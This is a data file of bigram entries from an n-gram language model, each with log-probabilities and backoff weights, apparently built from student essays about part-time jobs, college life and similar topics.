-2.7368789 I largely -0.048957378
-2.5645084 is largely -0.048957378
-1.9320052 <s> Firstly -0.58723795
-2.1028194 having been -0.048957378
-2.1756747 has been -0.048957378
-1.5503422 have been -0.048957378
-1.644695 never been -0.048957378
-2.7368789 I myself -0.048957378
-2.6468444 student myself -0.048957378
-1.4949656 I am -0.12183642
-0.6942267 gI am -0.048957378
-2.4103017 more aware -0.048957378
-2.4699326 people aware -0.048957378
-1.5370556 am aware -0.048957378
-2.3701181 many pressures -0.048957378
-1.4290154 financial pressures -0.048957378
-2.1481786 social pressures -0.048957378
-1.2958019 pressures generated -0.048957378
-2.6254168 with living -0.048957378
-3.018787 a living -0.048957378
-3.1851513 , living -0.048957378
-2.9531138 and living -0.048957378
-2.6332078 of living -0.048957378
-3.1322563 to living -0.048957378
-2.8239956 their living -0.048957378
-2.5824351 or living -0.048957378
-2.3254833 fs living -0.048957378
-1.715363 still living -0.048957378
-1.9010408 those living -0.048957378
-2.3362148 my living -0.048957378
-1.3848785 daily living -0.187397
-1.1659027 general living -0.048957378
-1.7676849 personal expenses -0.048957378
-0.2911761 living expenses -0.2246826
-2.223746 these expenses -0.048957378
-1.294531 cover expenses -0.048957378
-2.7708678 <s> Often -0.13618872
-2.7096968 that these -0.048957378
-2.5106988 , these -0.04895735
-1.9554527 In these -0.048957378
-2.1717682 in these -0.04895735
-2.8156636 of these -0.048957378
-2.902241 to these -0.048957378
-1.7263924 For these -0.3855526
-2.4218035 from these -0.048957378
-2.3253055 students these -0.187397
-2.546186 on these -0.048957378
-2.5625246 have these -0.048957378
-1.8171283 like these -0.048957378
-2.2691412 do these -0.048957378
-1.5673072 done these -0.048957378
-1.5654893 teach these -0.048957378
-1.9260192 during these -0.048957378
-0.6903279 easing these -0.048957378
-0.6903279 demonstrating these -0.048957378
-1.3731195 improve these -0.048957378
-1.5113788 explore these -0.048957378
-1.1592846 weigh these -0.048957378
-1.5184664 costs these -0.048957378
-1.2801979 practice these -0.048957378
-1.5166097 appreciate these -0.048957378
-1.5113788 All these -0.048957378
-1.2801979 pass these -0.048957378
-0.6903279 Sometimes these -0.048957378
-0.9872564 supporting these -0.048957378
-0.6903279 across these -0.048957378
-0.6903279 Between these -0.048957378
-2.9060166 are met -0.048957378
-3.3047535 a combination -0.048957378
-3.5096595 , grants -0.048957378
-2.6489563 with family -0.048957378
-2.387958 a family -0.04895735
-2.7687883 the family -0.04895735
-3.0156138 and family -0.048957378
-2.4083414 their family -0.27955192
-2.612026 or family -0.048957378
-2.0117862 future family -0.048957378
-1.7606759 Japanese family -0.048957378
-1.2906253 small family -0.048957378
-1.9244446 own family -0.048957378
-1.386072 every family -0.048957378
-2.2313263 these savings -0.048957378
-1.8673797 family savings -0.048957378
-1.4715303 usually restrict -0.048957378
-2.163114 job during -0.25144583
-3.1493895 , during -0.048957378
-2.2962427 study during -0.048957378
-1.9587044 working during -0.048957378
-2.6911027 time during -0.048957378
-2.6731453 work during -0.048957378
-1.9390066 themselves during -0.048957378
-1.2878569 lifestyle during -0.048957378
-2.075721 much during -0.048957378
-1.6740857 worked during -0.048957378
-1.9017588 hard during -0.048957378
-0.6922843 wastes during -0.048957378
-0.9911411 element during -0.048957378
-0.9911411 unproductive during -0.048957378
-1.3826258 goal during -0.048957378
-0.6922843 playing during -0.048957378
-3.2908964 a crucial -0.048957378
-1.1708648 developing crucial -0.048957378
-1.8729675 this period -0.048957378
-3.2358162 a period -0.048957378
-0.9944986 crucial period -0.048957378
-1.1700908 critical period -0.048957378
-2.8272688 the adult -0.187397
-3.1451926 and adult -0.048957378
-2.9430885 their adult -0.048957378
-2.4390335 an adult -0.04895735
-1.5348523 independent adult -0.048957378
-0.69368714 functioning adult -0.048957378
-2.9939594 for development -0.048957378
-2.839973 the development -0.187397
-3.1764908 and development -0.048957378
-1.5924584 adult development -0.048957378
-0.6938276 all-round development -0.048957378
-2.9652722 for earning -0.048957378
-2.7969828 be earning -0.048957378
-2.941432 that earning -0.048957378
-2.90795 , earning -0.048957378
-3.1159992 and earning -0.048957378
-2.3863747 also earning -0.048957378
-2.8200238 are earning -0.048957378
-3.3047535 a constructive -0.048957378
-2.3846152 this way -0.048957378
-3.036213 a way -0.048957378
-2.0211258 valuable way -0.048957378
-3.063924 the way -0.048957378
-2.8372147 their way -0.048957378
-2.5920763 or way -0.048957378
-1.9205885 no way -0.048957378
-0.6927047 constructive way -0.048957378
-1.9198133 own way -0.048957378
-1.5836447 great way -0.048957378
-1.5836447 best way -0.048957378
-2.3412793 my way -0.048957378
-2.0203838 his way -0.048957378
-3.28005 of easing -0.048957378
-2.4133134 by allowing -0.048957378
-3.246793 and allowing -0.048957378
-0.9947796 whilst allowing -0.048957378
-1.3541759 can lead -0.5805819
-3.3971481 , lead -0.048957378
-3.3489213 to lead -0.048957378
-1.2794199 may lead -0.20946135
-1.3902439 ultimately lead -0.048957378
-2.453272 an independent -0.048957378
-1.5034711 become independent -0.04895735
-2.4039898 more independent -0.048957378
-1.0617812 financially independent -0.048957378
-1.9317044 <s> Secondly -0.916374
-0.6942267 distracter Secondly -0.048957378
-2.1544547 with regards -0.187397
-2.013934 employment prospects -0.048957378
-2.5645084 is rarely -0.048957378
-2.8983755 are rarely -0.048957378
-2.2268438 only factor -0.048957378
-2.3632116 important factor -0.048957378
-1.5351577 second factor -0.048957378
-1.3895458 last factor -0.048957378
-1.3899099 negative factor -0.048957378
-1.913908 health factor -0.048957378
-2.5599043 the majority -0.27955192
-1.5956279 large majority -0.048957378
-3.2085369 a graduate -0.048957378
-3.1933482 of graduate -0.048957378
-3.3489213 to graduate -0.048957378
-1.7429656 they graduate -0.1722646
-1.7054864 we graduate -0.048957378
-3.2900462 , professional -0.048957378
-2.0833616 any professional -0.048957378
-3.0123634 in professional -0.048957378
-2.8945246 their professional -0.048957378
-2.0648875 become professional -0.048957378
-2.016433 future professional -0.048957378
-0.6932658 qualified professional -0.048957378
-0.6932658 educated professional -0.048957378
-1.5885828 develop professional -0.048957378
-3.2979217 and transferable -0.048957378
-2.2186792 the ability -0.2403142
-3.428628 , ability -0.048957378
-2.9787707 their ability -0.048957378
-1.9171832 academic ability -0.048957378
-2.920025 to communicate -0.048957378
-2.6489563 with customers -0.048957378
-2.9130242 for customers -0.048957378
-2.7687883 the customers -0.048957378
-2.3632026 of customers -0.04895735
-1.7915213 restaurant customers -0.048957378
-2.6645222 on customers -0.048957378
-2.0724325 If customers -0.048957378
-1.6818868 give customers -0.048957378
-0.9925369 handling customers -0.048957378
-1.386072 non-smoking customers -0.048957378
-0.6929851 selfish customers -0.048957378
-2.7969828 be responsible -0.048957378
-2.7055588 a responsible -0.048957378
-3.1159992 and responsible -0.048957378
-1.8577744 being responsible -0.048957378
-2.0711665 become responsible -0.048957378
-0.99365675 institutions responsible -0.048957378
-1.2928529 Being responsible -0.048957378
-3.102048 is almost -0.048957378
-2.8837602 are almost -0.048957378
-1.2950919 given almost -0.048957378
-1.3382984 academic achievement -0.187397
-2.569465 <s> Not -0.048957378
-3.28005 of demonstrating -0.048957378
-2.233106 these attributes -0.048957378
-2.3701181 many aspects -0.048957378
-1.966773 other aspects -0.048957378
-2.285778 what aspects -0.048957378
-2.250529 to enjoy -0.048957378
-2.821667 they enjoy -0.048957378
-2.434271 them enjoy -0.048957378
-1.3101277 really enjoy -0.048957378
-1.1696702 truly enjoy -0.048957378
-3.4650414 to expect -0.048957378
-2.941432 that once -0.048957378
-3.1159992 and once -0.048957378
-1.5340091 relationships once -0.048957378
-2.3897834 life once -0.048957378
-1.7266748 were once -0.048957378
-1.5335816 universities once -0.048957378
-1.1692609 begins once -0.048957378
-2.4324028 <s> Thirdly -0.50140065
-2.4266567 a wider -0.04895735
-1.1710447 wider scale -0.048957378
-3.2908964 a necessity -0.048957378
-3.2676826 of necessity -0.048957378
-2.469975 an economical -0.048957378
-2.4126248 a sense -0.13618872
-2.0235913 better sense -0.048957378
-0.6938276 economical sense -0.048957378
-1.2948219 growing sense -0.048957378
-0.6938276 false sense -0.048957378
-1.7708699 Many businesses -0.048957378
-1.1708648 allowing businesses -0.048957378
-2.7659814 not require -0.048957378
-0.99501497 businesses require -0.048957378
-2.218951 work force -0.0796529
-2.3904223 may force -0.048957378
-2.3365319 would force -0.048957378
-2.873293 be flexible -0.048957378
-3.120598 is flexible -0.048957378
-2.920025 to fill -0.048957378
-2.097776 I would -0.04895735
-2.3044932 this would -0.048957378
-1.8330964 it would -0.04895735
-2.0693212 that would -0.04895735
-2.130787 job would -0.048957378
-2.4572146 student would -0.048957378
-2.7388577 , would -0.048957378
-2.7421265 and would -0.048957378
-1.7469382 study would -0.13618872
-2.0694222 there would -0.048957378
-2.0406728 students would -0.04895735
-2.0217214 then would -0.048957378
-1.7249643 they would -0.09038658
-2.033479 This would -0.048957378
-1.8405796 It would -0.048957378
-2.308202 life would -0.048957378
-1.6185179 finances would -0.048957378
-1.2812839 That would -0.048957378
-0.98780924 answer would -0.048957378
-0.98780924 store would -0.048957378
-1.5149469 Some would -0.048957378
-1.5181254 books would -0.048957378
-1.6573156 Students would -0.187397
-1.3762115 she would -0.048957378
-2.1898277 we would -0.048957378
-1.3744649 choice would -0.048957378
-1.371275 restaurants would -0.048957378
-2.0774853 smoking would -0.048957378
-1.6908859 full-time member -0.048957378
-2.1499453 -RRB- member -0.048957378
-0.5854695 contributing member -0.187397
-3.28005 of staff -0.048957378
-2.0329945 In contrast -0.048957378
-2.08053 good arguments -0.048957378
-2.223746 these arguments -0.048957378
-1.5935729 both arguments -0.048957378
-0.9944986 separate arguments -0.048957378
-2.672149 can however -0.048957378
-2.291106 , however -0.1722646
-1.9625137 reason however -0.048957378
-2.1961105 studies however -0.048957378
-1.9135503 ; however -0.048957378
-1.2934115 arguments however -0.048957378
-3.4650414 to cope -0.187397
-2.7665153 it depends -0.048957378
-0.99501497 commitments depends -0.048957378
-3.321535 the situation -0.048957378
-2.1127527 This situation -0.048957378
-1.7676849 personal situation -0.048957378
-1.9410545 own situation -0.048957378
-1.1710447 largely determined -0.048957378
-2.013212 financial condition -0.048957378
-3.1356838 a year -0.048957378
-2.802924 the year -0.187397
-2.9101167 their year -0.048957378
-2.2788568 school year -0.048957378
-1.3891406 final year -0.048957378
-1.388153 every year -0.048957378
-0.6934062 sophomore year -0.048957378
-0.6934062 4th year -0.048957378
-3.4000094 the type -0.048957378
-1.5221592 any type -0.187397
-2.3022652 school builds -0.048957378
-3.5096595 , encourages -0.048957378
-2.0120695 financial stake -0.048957378
-0.99501497 `` stake -0.048957378
-2.7951853 for education -0.048957378
-2.9033272 the education -0.048957378
-2.0239635 of education -0.04895735
-2.079489 their education -0.40449065
-2.4649103 from education -0.048957378
-1.285946 quality education -0.048957378
-2.230697 school education -0.048957378
-1.8528848 an education -0.048957378
-1.63323 college education -0.17557326
-1.9939408 's education -0.048957378
-2.0249267 good education -0.048957378
-2.282163 fs education -0.048957378
-2.0578392 much education -0.048957378
-2.2976928 my education -0.048957378
-1.2845579 higher education -0.048957378
-0.9894719 advanced education -0.048957378
-1.1625811 proper education -0.048957378
-1.9203491 our education -0.048957378
-1.2845579 further education -0.048957378
-0.8040018 tertiary education -0.048957378
-1.8836768 health education -0.048957378
-0.69144475 incomplete education -0.048957378
-2.45335 this prepares -0.048957378
-3.2799814 and prepares -0.048957378
-3.0543673 a world -0.048957378
-1.8925264 the world -0.17892508
-1.9649823 working world -0.048957378
-2.7047815 work world -0.048957378
-1.9002689 academic world -0.04895735
-1.2174666 real world -0.07333779
-2.3370237 fs world -0.048957378
-1.5847367 adult world -0.048957378
-0.99225736 ereal world -0.048957378
-0.69284487 fascinating world -0.048957378
-0.69284487 Disney world -0.048957378
-0.69284487 greal world -0.048957378
-2.7267487 will encounter -0.048957378
-1.2958019 fre countless -0.048957378
-2.880715 be acquired -0.048957378
-2.1525254 most readily -0.048957378
-0.6942867 readily apparent -0.048957378
-2.709418 with balancing -0.048957378
-3.428628 , balancing -0.048957378
-3.089379 in balancing -0.048957378
-3.2102208 and balancing -0.048957378
-3.644728 <s> Skills -0.048957378
-1.8680823 like prioritization -0.048957378
-3.5096595 , multitasking -0.048957378
-3.428628 , finding -0.048957378
-3.089379 in finding -0.048957378
-3.21812 of finding -0.048957378
-2.8944666 to finding -0.048957378
-2.4483666 for success -0.048957378
-3.1880362 the success -0.048957378
-3.0267124 in success -0.048957378
-1.1684108 considerable success -0.048957378
-1.3347516 academic success -0.048957378
-1.3895564 finding success -0.048957378
-1.9314854 own success -0.048957378
-0.6934062 achieve success -0.048957378
-2.6254168 with going -0.048957378
-2.843989 , going -0.187397
-2.6392229 not going -0.048957378
-2.6256745 and going -0.187397
-2.641398 as going -0.048957378
-2.2094445 time going -0.048957378
-2.064076 then going -0.048957378
-1.8155167 : going -0.048957378
-2.5824351 or going -0.048957378
-2.726998 are going -0.048957378
-2.2914126 when going -0.048957378
-2.0492468 while going -0.187397
-1.7513353 always going -0.048957378
-1.1659027 Balancing going -0.048957378
-2.7329264 job provides -0.048957378
-2.4294076 experience provides -0.048957378
-2.5355608 working provides -0.048957378
-2.392312 also provides -0.048957378
-2.7264938 college provides -0.048957378
-1.727343 still provides -0.048957378
-3.2908964 a perfect -0.048957378
-2.878185 the perfect -0.048957378
-2.045974 valuable training -0.048957378
-3.321535 the training -0.048957378
-2.0674677 because training -0.048957378
-1.1700908 perfect training -0.048957378
-1.2956754 training ground -0.048957378
-1.1708648 middle ground -0.048957378
-2.1471612 will improve -0.048957378
-2.90557 to improve -0.048957378
-2.2294533 help improve -0.048957378
-2.569465 <s> Too -0.11268411
-3.321535 the burden -0.048957378
-2.0071845 financial burden -0.048957378
-1.1700908 proper burden -0.048957378
-0.69396824 unnecessary burden -0.048957378
-3.120598 is supported -0.048957378
-1.6465397 fully supported -0.048957378
-3.3489213 to entirely -0.048957378
-2.3983316 also entirely -0.048957378
-0.9942178 supported entirely -0.048957378
-0.9942178 herself entirely -0.048957378
-1.5672618 smoking entirely -0.048957378
-3.4204583 the consequence -0.048957378
-3.4000094 the concept -0.048957378
-1.8947358 little concept -0.187397
-2.8665538 the actual -0.048957378
-3.244391 of actual -0.048957378
-2.3673859 The actual -0.048957378
-2.1115448 the cost -0.5805819
-2.3479426 The cost -0.048957378
-1.5913469 true cost -0.048957378
-1.2937762 actual cost -0.048957378
-1.7684674 full cost -0.048957378
-1.2934115 labor cost -0.048957378
-3.09512 <s> Without -0.048957378
-2.7747319 job `` -0.048957378
-2.0120695 financial `` -0.048957378
-2.5535734 working '' -0.048957378
-0.9947796 stake '' -0.048957378
-1.5375328 means '' -0.048957378
-2.4042459 a place -0.13618872
-2.9262898 their place -0.048957378
-2.5331511 should place -0.048957378
-2.0375447 first place -0.048957378
-1.7258272 n't place -0.048957378
-1.2928529 another place -0.048957378
-1.467546 takes place -0.048957378
-2.3444166 the importance -0.30637136
-2.3479426 The importance -0.048957378
-1.9365996 no importance -0.048957378
-1.2934115 its importance -0.048957378
-0.9939372 utmost importance -0.048957378
-0.69368714 paramount importance -0.048957378
-2.1046777 that were -0.04895735
-2.784949 they were -0.048957378
-2.1421049 you were -0.048957378
-1.6380051 There were -0.048957378
-2.100664 parents were -0.048957378
-1.4660097 cards were -0.048957378
-2.3114288 would were -0.048957378
-1.1679918 Others were -0.048957378
-0.9930965 % were -0.048957378
-1.922429 classes coming -0.048957378
-2.7927094 and out -0.048957378
-2.0837967 most out -0.048957378
-2.4962344 or out -0.048957378
-1.7789398 taking out -0.048957378
-2.200524 get out -0.048957378
-1.8521662 going out -0.048957378
-0.69116527 coming out -0.048957378
-1.1799238 go out -0.048957378
-1.4531673 far out -0.048957378
-1.2849771 try out -0.048957378
-0.988917 round out -0.048957378
-0.988917 test out -0.048957378
-0.40829948 hang out -0.187397
-0.69116527 figuring out -0.048957378
-0.69116527 pointed out -0.048957378
-0.988917 carry out -0.048957378
-0.69116527 burn out -0.048957378
-0.69116527 move out -0.048957378
-0.69116527 strike out -0.048957378
-0.69116527 fresh out -0.048957378
-0.69116527 filling out -0.048957378
-0.69116527 shell out -0.048957378
-0.988917 dropped out -0.048957378
-0.69116527 drop out -0.048957378
-1.4151593 their own -0.048957378
-1.2521647 your own -0.048957378
-2.3736084 fs own -0.048957378
-2.378489 my own -0.048957378
-1.9589672 our own -0.048957378
-1.466047 his own -0.048957378
-1.9465656 own pockets -0.048957378
-2.328378 <s> That -0.13618872
-2.4799736 is where -0.048957378
-2.565259 , where -0.04895735
-2.8984869 and where -0.048957378
-2.9718513 of where -0.048957378
-3.0788198 to where -0.048957378
-1.2873054 internships where -0.048957378
-1.8369389 environment where -0.048957378
-2.3087277 fs where -0.048957378
-1.5803545 place where -0.048957378
-0.6921442 environments where -0.048957378
-1.7130257 lives where -0.048957378
-1.5814073 point where -0.048957378
-0.6921442 departments where -0.048957378
-0.99086237 meetings where -0.048957378
-1.526558 choose where -0.048957378
-0.6921442 colleagues where -0.048957378
-1.2873054 places where -0.048957378
-2.7044797 can contribute -0.048957378
-2.9150915 to contribute -0.187397
-2.9982424 that giving -0.048957378
-3.4625692 , giving -0.048957378
-2.4133134 by giving -0.048957378
-1.9028327 the value -0.7037435
-1.4687891 educational value -0.048957378
-1.5924584 true value -0.048957378
-1.2205254 real value -0.048957378
-0.6938276 promotes value -0.048957378
-2.0367153 often find -0.048957378
-2.0624037 to find -0.07613316
-2.3910592 students find -0.048957378
-2.5331511 should find -0.048957378
-2.6549041 or find -0.048957378
-2.1040707 even find -0.048957378
-1.7258272 still find -0.048957378
-2.4342768 this transition -0.048957378
-2.9939594 for transition -0.048957378
-2.839973 the transition -0.048957378
-3.3489213 to transition -0.048957378
-1.6908499 difficult transition -0.048957378
-3.321535 the campus -0.048957378
-2.5811288 from campus -0.048957378
-1.8265634 on campus -0.13618872
-2.7404244 college campus -0.048957378
-1.647248 College campuses -0.048957378
-2.9060166 are unique -0.048957378
-0.6942867 unique environments -0.048957378
-3.4204583 the passion -0.048957378
-2.5958927 with learning -0.048957378
-2.4080775 for learning -0.048957378
-2.4748268 is learning -0.048957378
-2.6982417 the learning -0.048957378
-2.5608099 , learning -0.04895735
-2.590611 and learning -0.048957378
-2.9576278 of learning -0.048957378
-2.4881823 from learning -0.048957378
-2.6136355 as learning -0.048957378
-2.123871 on learning -0.048957378
-2.6759744 time learning -0.048957378
-2.681605 are learning -0.048957378
-1.5782256 been learning -0.048957378
-1.5782256 great learning -0.048957378
-1.2867545 higher learning -0.048957378
-1.5804508 point learning -0.048957378
-0.99058396 mention learning -0.048957378
-0.99058396 Whether learning -0.048957378
-3.2979217 and discovery -0.048957378
-2.9060166 are cultivated -0.048957378
-3.4479775 to continue -0.048957378
-1.4711709 colleges continue -0.048957378
-3.4650414 to maintain -0.048957378
-2.1279233 can explore -0.048957378
-2.3912728 to explore -0.048957378
-1.7695215 To explore -0.048957378
-1.5382957 explore talents -0.048957378
-3.284121 the interests -0.048957378
-2.3590646 many interests -0.048957378
-3.1764908 and interests -0.048957378
-1.8613404 new interests -0.048957378
-0.9942178 changing interests -0.048957378
-2.3960257 a full -0.04895735
-2.7912447 the full -0.048957378
-2.3377671 many full -0.048957378
-3.1063578 of full -0.048957378
-2.8945246 their full -0.048957378
-2.5182657 working full -0.048957378
-2.7301192 work full -0.048957378
-2.7064013 college full -0.048957378
-1.5885828 enter full -0.048957378
-1.7720404 full extent -0.048957378
-1.1708648 certain extent -0.048957378
-3.1669025 , without -0.048957378
-2.3548002 by without -0.048957378
-2.061771 -LRB- without -0.048957378
-1.899711 career without -0.048957378
-1.8408649 environment without -0.048957378
-1.1654861 abilities without -0.048957378
-1.9641547 enough without -0.048957378
-1.632501 earn without -0.048957378
-1.9863565 society without -0.048957378
-1.8443289 family without -0.048957378
-2.2087579 education without -0.048957378
-1.985344 things without -0.048957378
-1.525456 us without -0.048957378
-1.4604971 live without -0.048957378
-0.69242436 meal without -0.048957378
-2.7659814 not worrying -0.048957378
-1.8672849 without worrying -0.048957378
-2.4799736 is about -0.048957378
-2.275306 part about -0.048957378
-1.58455 knowledge about -0.048957378
-2.373153 all about -0.048957378
-2.377569 them about -0.048957378
-2.0504048 learning about -0.048957378
-0.40868983 worrying about -0.048957378
-1.6141546 learn about -0.048957378
-0.95031416 lessons about -0.187397
-2.072689 much about -0.048957378
-1.2883778 insight about -0.048957378
-0.99086237 brought about -0.048957378
-1.1646541 studied about -0.048957378
-1.8130639 right about -0.048957378
-0.99086237 thinking about -0.048957378
-0.6921442 worried about -0.048957378
-0.6921442 worry about -0.04895735
-2.7044797 can translate -0.048957378
-2.3941946 may translate -0.048957378
-2.7556913 not directly -0.048957378
-0.9947796 translate directly -0.048957378
-0.69410884 ones directly -0.048957378
-3.3047535 a salable -0.048957378
-0.6942867 salable product -0.048957378
-1.2958019 particularly ones -0.048957378
-2.0510054 often expose -0.048957378
-3.4479775 to expose -0.048957378
-2.7368789 I partially -0.048957378
-2.2432292 only partially -0.048957378
-3.0178597 that awaits -0.048957378
-3.09512 <s> Should -0.048957378
-2.3729722 The answer -0.048957378
-0.6942267 yes-or-no answer -0.048957378
-2.45335 this question -0.048957378
-3.1215048 in question -0.048957378
-3.1303647 is subjective -0.048957378
-1.8381437 A blanket -0.048957378
-3.5096595 , yes-or-no -0.048957378
-3.4479775 to overlook -0.048957378
-2.3401537 would overlook -0.048957378
-2.9939594 for various -0.048957378
-3.284121 the various -0.048957378
-2.434271 them various -0.048957378
-1.766614 enjoy various -0.048957378
-2.0805624 out various -0.048957378
-1.6908859 These factors -0.048957378
-1.1705118 relevant factors -0.048957378
-1.6498554 these factors -0.048957378
-2.6912675 with different -0.048957378
-3.1828704 a different -0.048957378
-1.4679527 completely different -0.048957378
-2.1518767 very different -0.187397
-2.7526727 have different -0.048957378
-2.3174286 are different -0.187397
-3.2358162 a limited -0.048957378
-3.0808864 is limited -0.048957378
-3.321535 the limited -0.048957378
-2.7437143 not limited -0.048957378
-1.7200686 school supplies -0.187397
-3.4204583 the probable -0.048957378
-3.284121 the impact -0.048957378
-0.6938276 probable impact -0.048957378
-1.5359479 beneficial impact -0.048957378
-0.80680114 negative impact -0.048957378
-0.6938276 negatively impact -0.048957378
-2.749941 and energy -0.048957378
-3.014355 their energy -0.048957378
-0.995135 resulting reduction -0.048957378
-3.014355 their effectiveness -0.048957378
-2.3987331 fs effectiveness -0.048957378
-3.2979217 and completing -0.048957378
-2.9787707 their assignments -0.048957378
-2.6900918 or assignments -0.048957378
-0.69396824 completing assignments -0.048957378
-1.8356878 class assignments -0.048957378
-3.4204583 the relevance -0.048957378
-3.644728 <s> Considerations -0.048957378
-0.6942867 Considerations pertaining -0.048957378
-2.9060166 are fairly -0.048957378
-0.6942267 fairly straightforward -0.048957378
-0.6942267 pretty straightforward -0.048957378
-2.9652722 for either -0.048957378
-3.022964 is either -0.048957378
-2.6044638 student either -0.048957378
-3.2905889 to either -0.048957378
-2.5594692 from either -0.048957378
-2.2156067 help either -0.048957378
-1.7627151 always either -0.048957378
-2.7481966 it requires -0.048957378
-1.8906534 It requires -0.048957378
-1.536077 either requires -0.048957378
-0.69396824 Training requires -0.048957378
-2.64483 I support -0.048957378
-2.6259773 can support -0.048957378
-2.8795009 that support -0.048957378
-2.8613229 , support -0.048957378
-2.233448 to support -0.048957378
-2.6019366 or support -0.048957378
-2.3405304 do support -0.048957378
-1.6343127 fully support -0.048957378
-0.99225736 firmly support -0.048957378
-1.1667371 shall support -0.048957378
-0.69284487 emphatically support -0.048957378
-0.69284487 adequately support -0.048957378
-2.7796392 job rises -0.048957378
-3.2979217 and falls -0.048957378
-3.1293185 in relation -0.048957378
-2.7198546 it second -0.048957378
-3.1586366 a second -0.048957378
-3.2177634 the second -0.048957378
-3.340304 , second -0.048957378
-2.6948016 and second -0.187397
-2.34165 The second -0.048957378
-1.467118 My second -0.187397
-2.6891787 I never -0.048957378
-2.677301 will never -0.048957378
-1.8855287 have never -0.04895735
-1.4683348 say never -0.048957378
-2.1635911 could never -0.048957378
-2.3196363 would never -0.048957378
-1.8603482 had never -0.048957378
-2.2078578 is too -0.04895735
-2.8525696 , too -0.187397
-2.6486106 not too -0.048957378
-2.6504343 on too -0.048957378
-1.6346928 bad too -0.048957378
-1.9846538 are too -0.04895735
-2.089379 parents too -0.048957378
-2.3936956 all too -0.048957378
-2.065762 If too -0.048957378
-2.3648698 life too -0.048957378
-1.9902992 where too -0.048957378
-1.633089 But too -0.048957378
-1.5836447 perhaps too -0.048957378
-2.408415 a great -0.04895735
-3.0414262 is great -0.048957378
-3.2496762 the great -0.048957378
-2.0399847 make great -0.048957378
-1.9163997 too great -0.048957378
-0.69368714 create great -0.048957378
-2.1035345 -LRB- relative -0.048957378
-2.3779159 important relative -0.048957378
-2.031715 In addition -0.20946135
-2.0302927 in addition -0.20946135
-3.0230536 their scholastic -0.048957378
-2.7556913 not keep -0.048957378
-2.410627 also keep -0.048957378
-2.0498173 must keep -0.048957378
-2.8665538 the last -0.048957378
-2.7143507 will last -0.048957378
-2.3673859 The last -0.048957378
-1.894961 less complicated -0.048957378
-2.1511004 most complicated -0.048957378
-3.2908964 a determination -0.048957378
-1.5956279 true determination -0.048957378
-2.8497334 they stand -0.048957378
-1.9687632 our stand -0.048957378
-2.983328 that particular -0.048957378
-2.7312138 a particular -0.048957378
-2.0984125 any particular -0.048957378
-3.089379 in particular -0.048957378
-3.2908964 a convenience -0.187397
-2.5303967 at convenience -0.048957378
-0.995135 convenience store -0.048957378
-3.3144484 , someone -0.048957378
-3.2641199 to someone -0.048957378
-2.082634 If someone -0.048957378
-1.7639768 go someone -0.048957378
-1.292295 serve someone -0.048957378
-1.292295 determine someone -0.048957378
-1.292295 over someone -0.048957378
-1.2927897 efforts someone -0.048957378
-3.1586366 a business -0.048957378
-2.0375323 valuable business -0.048957378
-3.340304 , business -0.048957378
-2.192501 studying business -0.048957378
-2.6549041 or business -0.048957378
-2.0182273 about business -0.048957378
-0.99365675 ' business -0.048957378
-3.644728 <s> Each -0.048957378
-3.4163227 to weigh -0.048957378
-2.5549836 should weigh -0.048957378
-2.0498173 must weigh -0.048957378
-2.7398808 and decide -0.048957378
-3.4163227 to decide -0.048957378
-2.84126 they decide -0.048957378
-3.3971481 , based -0.048957378
-2.7320588 not based -0.048957378
-0.9942178 theory based -0.048957378
-1.293971 purely based -0.048957378
-0.6938276 formula based -0.048957378
-3.4204583 the particulars -0.048957378
-3.5692832 <s> feel -0.048957378
-1.6312175 I feel -0.099168696
-3.2102208 and feel -0.048957378
-2.4634845 people feel -0.048957378
-2.1834567 it allows -0.13618872
-2.489963 part-time allows -0.048957378
-2.1920223 job allows -0.048957378
-2.105565 This allows -0.048957378
-1.8862529 It allows -0.048957378
-0.9939372 wage allows -0.048957378
-2.6862712 will start -0.048957378
-2.5737934 to start -0.04895735
-1.9432847 they start -0.04895735
-2.272803 we start -0.048957378
-0.9939372 head start -0.048957378
-0.69368714 smooth start -0.048957378
-1.33811 ; building -0.048957378
-1.6926183 start building -0.048957378
-3.3047535 a strong -0.048957378
-2.2223525 work ethic -0.048957378
-3.2799814 and ease -0.048957378
-1.651054 help ease -0.048957378
-3.644728 <s> Young -0.048957378
-3.106568 in subjects -0.048957378
-2.9977748 their subjects -0.048957378
-1.9193444 academic subjects -0.048957378
-2.103136 can learn -0.04895735
-2.119264 will learn -0.048957378
-3.1851513 , learn -0.048957378
-2.9531138 and learn -0.048957378
-1.714014 to learn -0.10807813
-2.8548293 students learn -0.048957378
-1.4991031 also learn -0.04895735
-2.4974015 should learn -0.048957378
-1.9332619 they learn -0.04895735
-1.9984559 better learn -0.048957378
-1.134821 must learn -0.04895735
-1.8699213 really learn -0.048957378
-1.6757944 Students learn -0.048957378
-2.2407663 we learn -0.048957378
-2.0375323 valuable lessons -0.048957378
-1.9993248 financial lessons -0.048957378
-1.3888488 practical lessons -0.048957378
-2.35946 important lessons -0.048957378
-1.5343688 beneficial lessons -0.048957378
-1.9132066 those lessons -0.048957378
-1.1688302 attend lessons -0.048957378
-2.859086 be successful -0.187397
-2.7401137 a successful -0.187397
-1.2950919 build successful -0.048957378
-1.693077 start saving -0.048957378
-3.1828704 a free -0.048957378
-1.519052 any free -0.187397
-2.434089 their free -0.187397
-2.3401244 study free -0.048957378
-1.16925 2 free -0.048957378
-0.69368714 single free -0.048957378
-2.7309246 with structure -0.048957378
-3.4650414 to divide -0.048957378
-3.106568 in areas -0.048957378
-2.449753 all areas -0.048957378
-1.1705118 country areas -0.048957378
-2.7024844 or contacts -0.048957378
-1.645653 professional contacts -0.048957378
-1.5375328 business contacts -0.048957378
-2.5531027 is best -0.048957378
-2.5476494 the best -0.04895735
-2.9787707 their best -0.048957378
-2.3608074 The best -0.048957378
-2.6507893 student intends -0.048957378
-3.4650414 to pursue -0.048957378
-2.880715 be exhausting -0.048957378
-2.1137996 <s> So -0.105123706
-2.9179077 , let -0.048957378
-2.720708 not let -0.048957378
-3.1451926 and let -0.048957378
-3.3187766 to let -0.048957378
-2.5385072 should let -0.048957378
-1.8297838 And let -0.048957378
-2.7481966 it becomes -0.048957378
-2.7542121 job becomes -0.048957378
-0.9944986 Time becomes -0.048957378
-2.0472798 smoke becomes -0.048957378
-1.2958019 becomes time-consuming -0.048957378
-3.120598 is stressful -0.048957378
-2.7131412 or stressful -0.048957378
-3.0230536 their priorities -0.048957378
-0.6942867 priorities straight -0.048957378
-2.983328 that quit -0.048957378
-2.387845 to quit -0.048957378
-2.5494218 should quit -0.048957378
-1.3911768 likely quit -0.048957378
-2.9155905 that rather -0.048957378
-3.1138833 a rather -0.048957378
-2.18644 studying rather -0.048957378
-2.4667242 jobs rather -0.048957378
-1.5880291 potential rather -0.048957378
-1.9540708 themselves rather -0.048957378
